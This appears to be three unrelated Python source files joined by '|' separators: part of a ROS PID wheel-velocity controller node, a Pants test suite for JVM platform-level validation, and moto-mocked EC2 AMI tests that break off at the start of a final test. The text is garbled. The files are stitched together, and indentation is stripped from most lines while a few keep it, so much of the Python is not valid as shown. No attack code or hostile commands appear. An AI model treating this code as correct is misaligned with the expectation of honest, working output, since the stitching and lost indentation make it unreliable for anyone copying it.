self.then = rospy.Time.now()
self.pub_vel.publish(self.vel)
#####################################################
def appendVel(self, val):
#####################################################
self.prev_vel.append(val)
del self.prev_vel[0]
#####################################################
def calcRollingVel(self):
#####################################################
p = array(self.prev_vel)
self.vel = p.mean()
#####################################################
def doPid(self):
#####################################################
pid_dt_duration = rospy.Time.now() - self.prev_pid_time
pid_dt = pid_dt_duration.to_sec()
self.prev_pid_time = rospy.Time.now()
self.error = self.target - self.vel
self.integral = self.integral + (self.error * pid_dt)
# rospy.loginfo("i = i + (e * dt): %0.3f = %0.3f + (%0.3f * %0.3f)" % (self.integral, self.integral, self.error, pid_dt))
self.derivative = (self.error - self.previous_error) / pid_dt
self.previous_error = self.error
        self.motor = (self.Kp * self.error) + (self.Ki * self.integral) + (self.Kd * self.derivative)
        # Clamp the output to the actuator limits; when saturated, back out
        # the integral contribution just accumulated so the integrator
        # does not wind up.
        if self.motor > self.out_max:
            self.motor = self.out_max
            self.integral = self.integral - (self.error * pid_dt)
        if self.motor < self.out_min:
            self.motor = self.out_min
            self.integral = self.integral - (self.error * pid_dt)
        if (self.target == 0):
            self.motor = 0
rospy.logdebug("vel:%0.2f tar:%0.2f err:%0.2f int:%0.2f der:%0.2f ## motor:%d " %
(self.vel, self.target, self.error, self.integral, self.derivative, self.motor))
#####################################################
def wheelCallback(self, msg):
######################################################
enc = msg.data
if (enc < self.encoder_low_wrap and self.prev_encoder > self.encoder_high_wrap) :
self.wheel_mult = self.wheel_mult + 1
if (enc > self.encoder_high_wrap and self.prev_encoder < self.encoder_low_wrap) :
self.wheel_mult = self.wheel_mult - 1
self.wheel_latest = 1.0 * (enc + self.wheel_mult * (self.encoder_max - self.encoder_min)) / self.ticks_per_meter
self.prev_encoder = enc
# rospy.logdebug("-D- %s wheelCallback msg.data= %0.3f wheel_latest = %0.3f mult=%0.3f" % (self.nodename, enc, self.wheel_latest, self.wheel_mult))
######################################################
def targetCallback(self, msg):
######################################################
self.target = msg.data
self.ticks_since_target = 0
# rospy.logdebug("-D- %s targetCallback " % (self.nodename))
if __name__ == '__main__':
    """ main """
    try:
        pidVelocity = PidVelocity()
        pidVelocity.spin()
    except rospy.ROSInterruptException:
        pass
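######################################################
# Illustrative usage sketch (not part of the original node): drive this PID
# loop from another node by publishing a target velocity. The topic names
# match the subscribers above; the node name 'vtarget_demo' is an assumption.
#
#   import rospy
#   from std_msgs.msg import Float32
#
#   rospy.init_node('vtarget_demo')
#   pub = rospy.Publisher('wheel_vtarget', Float32, queue_size=10)
#   rate = rospy.Rate(10)
#   while not rospy.is_shutdown():
#       pub.publish(0.2)  # request 0.2 m/s; watch motor_cmd and wheel_vel
#       rate.sleep()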
|
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
from builtins import filter, object
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.tasks.jvm_platform_analysis import JvmPlatformExplain, JvmPlatformValidate
from pants.build_graph.target import Target
from pants_test.task_test_base import TaskTestBase
class JvmPlatformAnalysisTestMixin(object):
"""Common helper methods for testing JvmPlatformValidate and JvmPlatformExplain.
Mostly for building sets of targets that are interesting for testing.
"""
def _java(self, name, platform=None, deps=None):
return self.make_target(spec='java:{}'.format(name),
target_type=JavaLibrary,
platform=platform,
dependencies=deps or [],
sources=[])
def _plain(self, name, deps=None):
"""Make a non-jvm target, useful for testing non-jvm intermediate dependencies."""
return self.make_target(spec='java:{}'.format(name),
target_type=Target,
dependencies=deps or [],)
def simple_task(self, targets, **options):
self.set_options(**options)
platforms = {
'6': { 'source': 6, 'target': 6, 'args': [], },
'7': { 'source': 7, 'target': 7, 'args': [], },
'8': { 'source': 8, 'target': 8, 'args': [], },
}
self.set_options_for_scope('jvm-platform', platforms=platforms, default_platform='6')
context = self.context(target_roots=targets)
return self.create_task(context)
def bad_targets(self):
one = self._java('one', '7')
two = self._java('two', '6', deps=[one])
return [one, two]
def good_targets(self):
one = self._java('one', '6')
two = self._java('two', '7', deps=[one])
return [one, two]
def bad_transitive_targets(self):
one = self._java('one', '7')
middle = self._plain('middle', deps=[one])
two = self._java('two', '6', deps=[middle])
return [one, two, middle]
def good_transitive_targets(self):
one = self._java('one', '6')
middle = self._plain('middle', deps=[one])
two = self._java('two', '7', deps=[middle])
return [one, two, middle]
def impossible_targets(self):
a = self._java('a', '8')
b = self._java('b', '7', deps=[a])
c = self._java('c', '6', deps=[b])
# :b depends on :a, which means :b can't have a target lower than 8.
# :b is depended on by :c, which means :b can't have a target level higher than 6.
return [a, b, c]
class JvmPlatformValidateTest(JvmPlatformAnalysisTestMixin, TaskTestBase):
@classmethod
def task_type(cls):
return JvmPlatformValidate
def assert_no_warning(self, targets, **options):
    self.assertIsNone(self.simple_task(targets, **options).execute())
def assert_warning(self, targets, **options):
    self.assertIsNotNone(self.simple_task(targets, **options).execute())
def test_good_works(self):
self.assert_no_warning(self.good_targets(), check='fatal')
def test_transitive_good_works(self):
self.assert_no_warning(self.good_transitive_targets(), check='fatal')
def test_bad_fails(self):
with self.assertRaises(JvmPlatformValidate.IllegalJavaTargetLevelDependency):
self.simple_task(self.bad_targets(), check='fatal').execute()
def test_transitive_bad_fails(self):
with self.assertRaises(JvmPlatformValidate.IllegalJavaTargetLevelDependency):
self.simple_task(self.bad_transitive_targets(), check='fatal').execute()
def test_impossible_fails(self):
with self.assertRaises(JvmPlatformValidate.IllegalJavaTargetLevelDependency):
self.simple_task(self.impossible_targets(), check='fatal').execute()
def test_bad_ignored(self):
self.assert_no_warning(self.bad_targets(), check='off')
def test_transitive_bad_ignored(self):
self.assert_no_warning(self.bad_transitive_targets(), check='off')
def test_bad_warned(self):
self.assert_warning(self.bad_targets(), check='warn')
def test_transitive_bad_warned(self):
self.assert_warning(self.bad_transitive_targets(), check='warn')
def test_inverted_ordering_works(self):
self.assert_warning(self.bad_targets(), check='warn', children_before_parents=True)
def construct_interesting_graph(self):
"""Constructs an "interesting" transitive graph, with a mix of jvm and non-jvm targets.
Drawn in ascii below, with '->' indicating dependencies, with capital letters indicating
JvmTargets and lower-case letters indicating non-JvmTargets.
    A -> B
      -> c -> D -> l -> N
           -> f -> G
           -> e -> q
Constructed to demonstrate the behavior of jvm_dependency_map on dependency
graphs that include many intermediate dependencies which are not JvmTargets.
"""
q = self._plain('q')
e = self._plain('e', deps=[q])
n = self._java('n')
l = self._plain('l', deps=[n])
d = self._java('d', deps=[l])
g = self._java('g')
f = self._plain('f', deps=[g])
c = self._plain('c', deps=[d,f,e])
b = self._java('b')
a = self._java('a', deps=[b,c])
return [a,b,c,d,e,f,g,q,n,l]
def assert_depmaps_equal(self, expected, received):
jvm_deps = {target.name: ''.join(sorted({t.name for t in deps}))
for target, deps in received.items()}
for target, deps in sorted(expected.items()):
got = jvm_deps.get(target, ())
self.assertEqual(set(deps), set(got), '{}\n expected {}\n got {}\n \n{}'
.format(target, deps, got, '\n'.join(
'{}: {}'.format(key, val) for key, val in sorted(jvm_deps.items())
)))
self.assertEqual(len(list(filter(expected.get, expected))), len(list(filter(jvm_deps.get, jvm_deps))))
def test_non_jvm_transitivity(self):
"""Tests the behavior of jvm_dependency_map."""
expected = {
'n': '',
'g': '',
'q': '',
'l': 'n',
'd': 'n',
'f': 'g',
'e': '',
'c': 'gd',
'b': '',
'a': 'gdb',
}
jvm_deps = self.simple_task(self.construct_interesting_graph())._unfiltered_jvm_dependency_map()
self.assert_depmaps_equal(expected, jvm_deps)
def test_full_transitivity(self):
"""Tests the behavior of jvm_dependency_map when including all transitive dependencies."""
expected = {
'n': '',
'g': '',
'q': '',
'l': 'n',
'd': 'n',
'f': 'g',
'e': '',
'c': 'gdn',
'b': '',
'a': 'gdbn',
}
task = self.simple_task(self.construct_interesting_graph())
jvm_deps = task._unfiltered_jvm_dependency_map(fully_transitive=True)
self.assert_depmaps_equal(expected, jvm_deps)
class JvmPlatformExplainTest(JvmPlatformAnalysisTestMixin, TaskTestBase):
@classmethod
def task_type(cls):
return JvmPlatformExplain
def get_lines(self, targets, trimmed=True, **options):
output = self.simple_task(targets, **options).console_output(targets)
if trimmed:
output = [line.strip() for line in output if line and line.strip()]
return tuple(output)
def assert_lines(self, lines, targets, **options):
self.assertEqual(lines, self.get_lines(targets, **options))
def assert_length(self, count, targets, **options):
self.assertEqual(count, len(self.get_lines(targets, **options)))
def test_change_only_quiet(self):
lines = self.get_lines(self.good_targets(), only_broken=True)
self.assertEqual(1, len(lines))
self.assertIn('Allowable JVM platform ranges', lines[0])
def test_undetailed_good(self):
targets = self.good_transitive_targets()
self.assert_length(len(targets), targets, detailed=False)
def test_broken(self):
one = self._java('one', '7')
two = self._java('two', '6', deps=[one])
targets = [one, two]
expected = ('Allowable JVM platform ranges (* = anything):',
'java:one: <=1.6 (is 1.7)',
'max=1.6 because of dependees:',
'java:two',
'java:two: 1.7+ (is 1.6)',
'min=1.7 because of dependencies:',
'java:one',)
self.assert_lines(expected, targets, only_broken=True, colors=False)
def test_upgradeable(self):
one = self._java('one', '6')
two = self._java('two', '7', deps=[one])
three = self._java('three', '6', deps=[one])
text = '\n'.join(self.get_lines([one, two, three], colors=False, ranges=False, upgradeable=True))
self.assertNotIn('java:one', text)
self.assertIn('java:three', text)
self.assertIn('java:two', text)
def test_downgradeable(self):
one = self._java('one', '6')
two = self._java('two', '7', deps=[one])
nope = self._java('nope', '6', deps=[one])
text = '\n'.join(self.get_lines([one, two, nope], colors=False, ranges=False,
downgradeable=True))
self.assertIn('java:one', text)
self.assertNotIn('java:nope', text)
self.assertIn('java:two', text)
|
|
from __future__ import unicode_literals
# Ensure 'assert_raises' context manager support for Python 2.6
import tests.backport_assert_raises # noqa
from nose.tools import assert_raises
import boto
import boto.ec2
import boto3
from boto.exception import EC2ResponseError
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2
from tests.helpers import requires_boto_gte
@mock_ec2_deprecated
def test_ami_create_and_delete():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
with assert_raises(EC2ResponseError) as ex:
image_id = conn.create_image(
instance.id, "test-ami", "this is a test ami", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateImage operation: Request would have succeeded, but DryRun flag is set')
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
all_images = conn.get_all_images()
image = all_images[0]
image.id.should.equal(image_id)
image.virtualization_type.should.equal(instance.virtualization_type)
image.architecture.should.equal(instance.architecture)
image.kernel_id.should.equal(instance.kernel)
image.platform.should.equal(instance.platform)
image.creationDate.should_not.be.none
instance.terminate()
# Validate auto-created volume and snapshot
volumes = conn.get_all_volumes()
volumes.should.have.length_of(1)
volume = volumes[0]
snapshots = conn.get_all_snapshots()
snapshots.should.have.length_of(1)
snapshot = snapshots[0]
image.block_device_mapping.current_value.snapshot_id.should.equal(
snapshot.id)
snapshot.description.should.equal(
"Auto-created snapshot for AMI {0}".format(image.id))
snapshot.volume_id.should.equal(volume.id)
# Deregister
with assert_raises(EC2ResponseError) as ex:
success = conn.deregister_image(image_id, dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the DeregisterImage operation: Request would have succeeded, but DryRun flag is set')
success = conn.deregister_image(image_id)
success.should.be.true
with assert_raises(EC2ResponseError) as cm:
conn.deregister_image(image_id)
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@requires_boto_gte("2.14.0")
@mock_ec2_deprecated
def test_ami_copy():
conn = boto.ec2.connect_to_region("us-west-1")
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
source_image_id = conn.create_image(
instance.id, "test-ami", "this is a test ami")
instance.terminate()
source_image = conn.get_all_images(image_ids=[source_image_id])[0]
# Boto returns a 'CopyImage' object with an image_id attribute here. Use
# the image_id to fetch the full info.
with assert_raises(EC2ResponseError) as ex:
copy_image_ref = conn.copy_image(
source_image.region.name, source_image.id, "test-copy-ami", "this is a test copy ami", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CopyImage operation: Request would have succeeded, but DryRun flag is set')
copy_image_ref = conn.copy_image(
source_image.region.name, source_image.id, "test-copy-ami", "this is a test copy ami")
copy_image_id = copy_image_ref.image_id
copy_image = conn.get_all_images(image_ids=[copy_image_id])[0]
copy_image.id.should.equal(copy_image_id)
copy_image.virtualization_type.should.equal(
source_image.virtualization_type)
copy_image.architecture.should.equal(source_image.architecture)
copy_image.kernel_id.should.equal(source_image.kernel_id)
copy_image.platform.should.equal(source_image.platform)
# Validate auto-created volume and snapshot
conn.get_all_volumes().should.have.length_of(2)
conn.get_all_snapshots().should.have.length_of(2)
copy_image.block_device_mapping.current_value.snapshot_id.should_not.equal(
source_image.block_device_mapping.current_value.snapshot_id)
# Copy from non-existent source ID.
with assert_raises(EC2ResponseError) as cm:
conn.copy_image(source_image.region.name, 'ami-abcd1234',
"test-copy-ami", "this is a test copy ami")
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Copy from non-existent source region.
with assert_raises(EC2ResponseError) as cm:
invalid_region = 'us-east-1' if (source_image.region.name !=
'us-east-1') else 'us-west-1'
conn.copy_image(invalid_region, source_image.id,
"test-copy-ami", "this is a test copy ami")
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ami_tagging():
conn = boto.connect_vpc('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_all_images()[0]
with assert_raises(EC2ResponseError) as ex:
image.add_tag("a key", "some value", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateTags operation: Request would have succeeded, but DryRun flag is set')
image.add_tag("a key", "some value")
tag = conn.get_all_tags()[0]
tag.name.should.equal("a key")
tag.value.should.equal("some value")
    # Refresh the image and check that the tag is visible on it
image = conn.get_all_images()[0]
image.tags.should.have.length_of(1)
image.tags["a key"].should.equal("some value")
@mock_ec2_deprecated
def test_ami_create_from_missing_instance():
conn = boto.connect_ec2('the_key', 'the_secret')
args = ["i-abcdefg", "test-ami", "this is a test ami"]
with assert_raises(EC2ResponseError) as cm:
conn.create_image(*args)
cm.exception.code.should.equal('InvalidInstanceID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ami_pulls_attributes_from_instance():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
instance.modify_attribute("kernel", "test-kernel")
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
image.kernel_id.should.equal('test-kernel')
@mock_ec2_deprecated
def test_ami_filters():
conn = boto.connect_ec2('the_key', 'the_secret')
reservationA = conn.run_instances('ami-1234abcd')
instanceA = reservationA.instances[0]
instanceA.modify_attribute("architecture", "i386")
instanceA.modify_attribute("kernel", "k-1234abcd")
instanceA.modify_attribute("platform", "windows")
instanceA.modify_attribute("virtualization_type", "hvm")
imageA_id = conn.create_image(
instanceA.id, "test-ami-A", "this is a test ami")
imageA = conn.get_image(imageA_id)
reservationB = conn.run_instances('ami-abcd1234')
instanceB = reservationB.instances[0]
instanceB.modify_attribute("architecture", "x86_64")
instanceB.modify_attribute("kernel", "k-abcd1234")
instanceB.modify_attribute("platform", "linux")
instanceB.modify_attribute("virtualization_type", "paravirtual")
imageB_id = conn.create_image(
instanceB.id, "test-ami-B", "this is a test ami")
imageB = conn.get_image(imageB_id)
    imageB.set_launch_permissions(group_names=["all"])
amis_by_architecture = conn.get_all_images(
filters={'architecture': 'x86_64'})
set([ami.id for ami in amis_by_architecture]).should.equal(set([imageB.id]))
amis_by_kernel = conn.get_all_images(filters={'kernel-id': 'k-abcd1234'})
set([ami.id for ami in amis_by_kernel]).should.equal(set([imageB.id]))
amis_by_virtualization = conn.get_all_images(
filters={'virtualization-type': 'paravirtual'})
set([ami.id for ami in amis_by_virtualization]
).should.equal(set([imageB.id]))
amis_by_platform = conn.get_all_images(filters={'platform': 'windows'})
set([ami.id for ami in amis_by_platform]).should.equal(set([imageA.id]))
amis_by_id = conn.get_all_images(filters={'image-id': imageA.id})
set([ami.id for ami in amis_by_id]).should.equal(set([imageA.id]))
amis_by_state = conn.get_all_images(filters={'state': 'available'})
set([ami.id for ami in amis_by_state]).should.equal(
set([imageA.id, imageB.id]))
amis_by_name = conn.get_all_images(filters={'name': imageA.name})
set([ami.id for ami in amis_by_name]).should.equal(set([imageA.id]))
amis_by_public = conn.get_all_images(filters={'is-public': True})
set([ami.id for ami in amis_by_public]).should.equal(set([imageB.id]))
amis_by_nonpublic = conn.get_all_images(filters={'is-public': False})
set([ami.id for ami in amis_by_nonpublic]).should.equal(set([imageA.id]))
@mock_ec2_deprecated
def test_ami_filtering_via_tag():
conn = boto.connect_vpc('the_key', 'the_secret')
reservationA = conn.run_instances('ami-1234abcd')
instanceA = reservationA.instances[0]
imageA_id = conn.create_image(
instanceA.id, "test-ami-A", "this is a test ami")
imageA = conn.get_image(imageA_id)
imageA.add_tag("a key", "some value")
reservationB = conn.run_instances('ami-abcd1234')
instanceB = reservationB.instances[0]
imageB_id = conn.create_image(
instanceB.id, "test-ami-B", "this is a test ami")
imageB = conn.get_image(imageB_id)
imageB.add_tag("another key", "some other value")
amis_by_tagA = conn.get_all_images(filters={'tag:a key': 'some value'})
set([ami.id for ami in amis_by_tagA]).should.equal(set([imageA.id]))
amis_by_tagB = conn.get_all_images(
filters={'tag:another key': 'some other value'})
set([ami.id for ami in amis_by_tagB]).should.equal(set([imageB.id]))
@mock_ec2_deprecated
def test_getting_missing_ami():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as cm:
conn.get_image('ami-missing')
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_getting_malformed_ami():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as cm:
conn.get_image('foo-missing')
cm.exception.code.should.equal('InvalidAMIID.Malformed')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ami_attribute_group_permissions():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Baseline
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.name.should.equal('launch_permission')
attributes.attrs.should.have.length_of(0)
ADD_GROUP_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'add',
'groups': 'all'}
REMOVE_GROUP_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'groups': 'all'}
# Add 'all' group and confirm
with assert_raises(EC2ResponseError) as ex:
conn.modify_image_attribute(
**dict(ADD_GROUP_ARGS, **{'dry_run': True}))
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the ModifyImageAttribute operation: Request would have succeeded, but DryRun flag is set')
conn.modify_image_attribute(**ADD_GROUP_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['groups'].should.have.length_of(1)
attributes.attrs['groups'].should.equal(['all'])
image = conn.get_image(image_id)
image.is_public.should.equal(True)
# Add is idempotent
conn.modify_image_attribute.when.called_with(
**ADD_GROUP_ARGS).should_not.throw(EC2ResponseError)
# Remove 'all' group and confirm
conn.modify_image_attribute(**REMOVE_GROUP_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Remove is idempotent
conn.modify_image_attribute.when.called_with(
**REMOVE_GROUP_ARGS).should_not.throw(EC2ResponseError)
@mock_ec2_deprecated
def test_ami_attribute_user_permissions():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Baseline
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.name.should.equal('launch_permission')
attributes.attrs.should.have.length_of(0)
# Both str and int values should work.
USER1 = '123456789011'
USER2 = 123456789022
ADD_USERS_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'add',
'user_ids': [USER1, USER2]}
REMOVE_USERS_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'user_ids': [USER1, USER2]}
REMOVE_SINGLE_USER_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'user_ids': [USER1]}
# Add multiple users and confirm
conn.modify_image_attribute(**ADD_USERS_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['user_ids'].should.have.length_of(2)
set(attributes.attrs['user_ids']).should.equal(
set([str(USER1), str(USER2)]))
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Add is idempotent
conn.modify_image_attribute.when.called_with(
**ADD_USERS_ARGS).should_not.throw(EC2ResponseError)
# Remove single user and confirm
conn.modify_image_attribute(**REMOVE_SINGLE_USER_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['user_ids'].should.have.length_of(1)
set(attributes.attrs['user_ids']).should.equal(set([str(USER2)]))
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Remove multiple users and confirm
conn.modify_image_attribute(**REMOVE_USERS_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Remove is idempotent
conn.modify_image_attribute.when.called_with(
**REMOVE_USERS_ARGS).should_not.throw(EC2ResponseError)
@mock_ec2_deprecated
def test_ami_describe_executable_users():
conn = boto3.client('ec2', region_name='us-east-1')
ec2 = boto3.resource('ec2', 'us-east-1')
ec2.create_instances(ImageId='',
MinCount=1,
MaxCount=1)
response = conn.describe_instances(Filters=[{'Name': 'instance-state-name','Values': ['running']}])
instance_id = response['Reservations'][0]['Instances'][0]['InstanceId']
image_id = conn.create_image(InstanceId=instance_id,
Name='TestImage',)['ImageId']
USER1 = '123456789011'
ADD_USER_ARGS = {'ImageId': image_id,
'Attribute': 'launchPermission',
'OperationType': 'add',
'UserIds': [USER1]}
    # Add the user and verify the image is returned for that executable user
conn.modify_image_attribute(**ADD_USER_ARGS)
attributes = conn.describe_image_attribute(ImageId=image_id,
Attribute='LaunchPermissions',
DryRun=False)
attributes['LaunchPermissions'].should.have.length_of(1)
attributes['LaunchPermissions'][0]['UserId'].should.equal(USER1)
images = conn.describe_images(ExecutableUsers=[USER1])['Images']
images.should.have.length_of(1)
images[0]['ImageId'].should.equal(image_id)
@mock_ec2_deprecated
def test_ami_describe_executable_users_negative():
conn = boto3.client('ec2', region_name='us-east-1')
ec2 = boto3.resource('ec2', 'us-east-1')
ec2.create_instances(ImageId='',
MinCount=1,
MaxCount=1)
response = conn.describe_instances(Filters=[{'Name': 'instance-state-name','Values': ['running']}])
instance_id = response['Reservations'][0]['Instances'][0]['InstanceId']
image_id = conn.create_image(InstanceId=instance_id,
Name='TestImage')['ImageId']
USER1 = '123456789011'
USER2 = '113355789012'
ADD_USER_ARGS = {'ImageId': image_id,
'Attribute': 'launchPermission',
'OperationType': 'add',
'UserIds': [USER1]}
    # Add USER1, then query as USER2 and expect no images
conn.modify_image_attribute(**ADD_USER_ARGS)
attributes = conn.describe_image_attribute(ImageId=image_id,
Attribute='LaunchPermissions',
DryRun=False)
attributes['LaunchPermissions'].should.have.length_of(1)
attributes['LaunchPermissions'][0]['UserId'].should.equal(USER1)
images = conn.describe_images(ExecutableUsers=[USER2])['Images']
images.should.have.length_of(0)
@mock_ec2_deprecated
def test_ami_describe_executable_users_and_filter():
conn = boto3.client('ec2', region_name='us-east-1')
ec2 = boto3.resource('ec2', 'us-east-1')
ec2.create_instances(ImageId='',
MinCount=1,
MaxCount=1)
response = conn.describe_instances(Filters=[{'Name': 'instance-state-name','Values': ['running']}])
instance_id = response['Reservations'][0]['Instances'][0]['InstanceId']
image_id = conn.create_image(InstanceId=instance_id,
Name='ImageToDelete',)['ImageId']
USER1 = '123456789011'
ADD_USER_ARGS = {'ImageId': image_id,
'Attribute': 'launchPermission',
'OperationType': 'add',
'UserIds': [USER1]}
    # Add the user and verify the image is returned when the executable-users
    # query is combined with a state filter
conn.modify_image_attribute(**ADD_USER_ARGS)
attributes = conn.describe_image_attribute(ImageId=image_id,
Attribute='LaunchPermissions',
DryRun=False)
attributes['LaunchPermissions'].should.have.length_of(1)
attributes['LaunchPermissions'][0]['UserId'].should.equal(USER1)
images = conn.describe_images(ExecutableUsers=[USER1],
Filters=[{'Name': 'state', 'Values': ['available']}])['Images']
images.should.have.length_of(1)
images[0]['ImageId'].should.equal(image_id)
@mock_ec2_deprecated
def test_ami_attribute_user_and_group_permissions():
"""
Boto supports adding/removing both users and groups at the same time.
Just spot-check this -- input variations, idempotency, etc are validated
via user-specific and group-specific tests above.
"""
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Baseline
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.name.should.equal('launch_permission')
attributes.attrs.should.have.length_of(0)
USER1 = '123456789011'
USER2 = '123456789022'
ADD_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'add',
'groups': ['all'],
'user_ids': [USER1, USER2]}
REMOVE_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'groups': ['all'],
'user_ids': [USER1, USER2]}
# Add and confirm
conn.modify_image_attribute(**ADD_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['user_ids'].should.have.length_of(2)
set(attributes.attrs['user_ids']).should.equal(set([USER1, USER2]))
set(attributes.attrs['groups']).should.equal(set(['all']))
image = conn.get_image(image_id)
image.is_public.should.equal(True)
# Remove and confirm
conn.modify_image_attribute(**REMOVE_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
image = conn.get_image(image_id)
image.is_public.should.equal(False)
@mock_ec2_deprecated
def test_ami_attribute_error_cases():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Error: Add with group != 'all'
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
groups='everyone')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with user ID that isn't an integer.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids='12345678901A')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with user ID that is > length 12.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids='1234567890123')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with user ID that is < length 12.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids='12345678901')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with one invalid user ID among other valid IDs, ensure no
# partial changes.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids=['123456789011', 'foo', '123456789022'])
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
# Error: Add with invalid image ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute("ami-abcd1234",
attribute='launchPermission',
operation='add',
groups='all')
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Remove with invalid image ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute("ami-abcd1234",
attribute='launchPermission',
operation='remove',
groups='all')
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
"""
Boto3
"""
@mock_ec2
def test_ami_filter_wildcard():
